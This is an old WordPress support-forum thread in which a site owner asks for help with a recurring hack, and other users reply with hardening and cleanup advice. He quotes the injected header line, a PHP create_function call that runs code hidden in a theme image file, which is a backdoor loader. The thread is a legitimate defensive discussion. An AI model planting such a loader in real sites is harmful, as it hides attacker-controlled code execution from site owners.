WordPress.org

Ready to get started?Download WordPress

Forums

WordPress Hacked Again Need Recommendations (5 posts)

  1. mata230
    Member
    Posted 2 years ago #

    Hi WordPress Community,
    I dearly need your help in trying to stop a hacker which has been plaguing my site since WordPress version 2.9. The hack is destroying my web ranking as it only displays to Search Engine Bots E.G Google and Yahoo.

    The hacker / spammer is adding this to my header:

    <?php $wp__theme_icon=@create_function('',@file_get_contents('/public_html/wp-content/themes/prophoto3/images/spa2.gif'));$wp__theme_icon(); ?>

    I've deleted it over 100 times over the last couple of months and hardened my wordpress install with plugins like:

    Better WP Security
    Exploit Scanner
    Secure WordPress
    Ultimate Security Checker
    WP Security Scan

    and the intruder is still able to come in.

    I made sure to change my admin from wp-admin to a random link, also changed my admin login to a random one. I've also 644 header.php on my theme and locked down the backend from being able to edit my theme to no help.

    At this point I'm ready to throw the white flag. After reading numerous posts on pharma hack etc.. I see myself as an expert to a topic which never meant anything to me.

    Can anyone recommend a reputable company that will help me get rid of this hack as it is hurting my ranking dearly.

    Any help would be greatly appreciated.

    Sincerely,
    Michael

  2. esmi
    Forum Moderator
    Posted 2 years ago #

    Contact your hosts. The hacker may be gaining access somewhere else on the server.

  3. MickeyRoush
    Member
    Posted 2 years ago #

    644 file permissions will not stop them from writing to your files if they've gained owner rights. You'd have to set it to 444. Which means you'd have to set it back to 644 when you have to update|edit|replace it.

    As esmi said they could be gaining access anywhere. Check your server logs and if you use SFTP check those logs as well if you have them, if not, you'll need to contact your host to see if they see anything malicious.

    Have you cleaned your workstation computer to make sure it's not infected? And if so, have you changed all of your passwords.

    There are botnets out there that bruteforce attack FTP/SFTPs.

  4. mata230
    Member
    Posted 2 years ago #

    Hi Guys,
    Thanks for the replied Esmi and Mickey!!

    Esmi, I wouldn't think it's the webhost as it's a pretty large web hosting company which is hosting a large amount of blogs which are not having any issues and the /home directory is 700.

    Mickey, thanks for the advise!! I've chmod 444 the header file will see if the attacker is able to modify the file. If the hacker can modify the file he probably exploited shell access to the server. As for the password all passwords were changed.

    Any companies you guys would recommend if this continues?

  5. MickeyRoush
    Member
    Posted 2 years ago #

    @ mata230

    Any companies you guys would recommend if this continues?

    You could try contacting these guys:
    http://sucuri.net/

    Or put in a request here:

    http://jobs.wordpress.net/

Topic Closed

This topic has been closed to new replies.

About this Topic